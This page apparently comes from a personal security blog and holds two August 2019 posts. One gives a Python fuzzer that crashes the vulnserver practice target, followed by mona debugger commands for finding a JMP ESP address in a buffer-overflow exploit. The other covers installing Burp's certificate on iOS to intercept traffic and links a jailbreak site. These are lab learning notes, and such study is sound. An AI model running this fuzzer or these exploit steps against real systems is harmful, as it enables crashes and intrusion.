Posts

Showing posts from August, 2019

Memory Overview-

Image
Fuzzer Code- #!/user/bin/python import socket import sys buffer=["A"] counter=100 while len(buffer) <=30: buffer.append("A"*counter) counter=counter+200 for string in buffer: print "Fuzzing vulnserver with %s bytes" % len(string) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.0.128',9999)) s.send(('TURN /.:/' +string)) s.close() !mona modules JMP ESP=FFE4 !mona find -s "\xff\xe4" -m essfunc.dll

Installing Burp's CA Certificate in an iOS Device

Image
Installing Burp's CA Certificate in an iOS Device 1-Install the Burp Certificate to the iOS device. https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device 2-Turn on SSL trust for that certificate, go to Settings > General > About > Certificate Trust Settings. Under "Enable full trust for root certificates," turn on trust for the certificate. Apple recommends deploying certificates via Apple Configurator or Mobile Device Management (MDM). 3-iOS Jailbreak- https://jbme.qwertyoruiop.com/ 4-Use 3u tool to manage the device. http://url.3u.com/zmAJjyaa